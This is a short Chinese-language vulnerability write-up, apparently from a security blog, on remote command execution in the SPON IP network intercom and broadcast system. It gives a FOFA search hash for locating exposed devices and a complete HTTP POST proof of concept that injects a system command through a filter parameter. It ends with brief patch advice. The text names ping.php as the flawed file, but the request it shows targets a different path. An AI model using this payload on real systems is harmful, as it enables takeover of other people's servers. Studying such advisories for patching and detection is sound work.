产品简介

                  世邦通信 SPON IP网络对讲广播系统采用领先的IPAudio技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

-----------------------------------

漏洞描述

                 世邦通信 SPON IP网络对讲广播系统 ping.php 存在任意命令执行漏洞，攻击者通过漏洞可以执行服务器任意命令控制服务器

-----------------------------------

网络空间测绘:

fofa:           icon_hash="-1830859634"

              开启抓包：

         发送到重放器：

          漏洞利用：

                  poc:

POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 52

s=id&_method=__construct&method=POST&filter[]=system

修复建议：

                     1、升级至最新安全版本。
                     2、限制接口访问。